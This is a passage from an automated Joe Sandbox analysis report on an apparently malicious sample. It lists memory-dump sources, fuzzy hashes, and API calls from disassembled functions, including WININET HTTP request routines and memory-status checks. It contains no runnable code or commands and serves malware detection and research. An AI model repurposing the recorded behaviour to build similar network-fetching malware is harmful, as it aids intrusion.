• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
• String ID: invalid string position
• API String ID: 3404309857-1799206989
• Opcode ID: 681e28146d4c68ac1800aba1263bb25c90851f0c67b944c22ce3e9adb2d612c2
• Instruction ID: f9dcbd964029ec7bbf8a48b7b8c20fdc4c162af82ae9a3bd3b0436e1a9936bb0
• Opcode Fuzzy Hash: 681e28146d4c68ac1800aba1263bb25c90851f0c67b944c22ce3e9adb2d612c2
• Instruction Fuzzy Hash: 1C11AD35704204DBCB14BE2CDC8856977A6AF29361B54463DF829CB242C770EA82CFE1
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 0018F331
  • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECAA
  • Part of subcall function 001AEC95: __CxxThrowException@8.LIBCMT ref: 001AECBF
  • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECD0
• memmove.MSVCRT(0018EE93,0018EE93,C6C68B00,0018EE93,0018EE93,0018F134,?,?,?,0018F1B4,?,?,?,74DF0440,?,-00000001), ref: 0018F367
Strings
• invalid string position, xrefs: 0018F32C
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
• String ID: invalid string position
• API String ID: 1659287814-1799206989
• Opcode ID: dcfa0a2484a1274433f320cd88c1876377e8944e57d4863061a12f3efeba76a4
• Instruction ID: d51af1046342416205e9e6b45e79089c7f8f7306fa0bba6c997fc320c0354224
• Opcode Fuzzy Hash: dcfa0a2484a1274433f320cd88c1876377e8944e57d4863061a12f3efeba76a4
• Instruction Fuzzy Hash: 2D0181713006018BD728AE7898D852EB6E6FBC8711724493CE892C7745DBB4EE4BDB90
APIs
  • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
  • Part of subcall function 00186963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 001869C5
  • Part of subcall function 00186963: StrCmpCA.SHLWAPI(?), ref: 001869DF
  • Part of subcall function 00186963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186A0E
  • Part of subcall function 00186963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00186A4D
  • Part of subcall function 00186963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00186A7D
  • Part of subcall function 00186963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186A88
  • Part of subcall function 00186963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00186AAC
• StrCmpCA.SHLWAPI(?,ERROR), ref: 001968B5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
• String ID: ERROR$ERROR
• API String ID: 3086566538-2579291623
• Opcode ID: a301efd1c3e4050218f6965065d531a4d4f484e10c8455dd7512e7ed5199b558
• Instruction ID: 3dcb6e384155dc8c11630cc306b1390b0353a20102524cfaed647baef55fbbf4
• Opcode Fuzzy Hash: a301efd1c3e4050218f6965065d531a4d4f484e10c8455dd7512e7ed5199b558
• Instruction Fuzzy Hash: 7D01FB35E002189BCB22BB75EC4699D77A8AF34304B5441A1FD24E3253DB34EE058BE1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: NameName::
• String ID: {flat}
• API String ID: 1333004437-2606204563
• Opcode ID: 8d82a1d2f0a4b58729c0bba60cfe1d744be8fb30f942274fee52286b1d898ea6
• Instruction ID: b7b4bf86060d7c4a2242cdc4e34d691f2e0f99a88a81ca1372e367c857aea795
• Opcode Fuzzy Hash: 8d82a1d2f0a4b58729c0bba60cfe1d744be8fb30f942274fee52286b1d898ea6
• Instruction Fuzzy Hash: 75F06D71281248AFCF11EF58E855BA63BA5EF45B55F48C089F94C8F296C770D883CB92
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus_memset
• String ID: @
• API String ID: 587104284-2766056989
• Opcode ID: 7cf19ffa1e4966a44813d3c9923df2f07f1a3e1a240e07bcd2579474d1c639d4
• Instruction ID: 402a55b8f960442dedb21833cc2e2b49840b0f8585ec4b5fb48c9d258b9f0af7
• Opcode Fuzzy Hash: 7cf19ffa1e4966a44813d3c9923df2f07f1a3e1a240e07bcd2579474d1c639d4
• Instruction Fuzzy Hash: 3BE0BFF590020CABDB04EFA4E946B5DB7B8AB18744F500025BA06F7281E774BB098655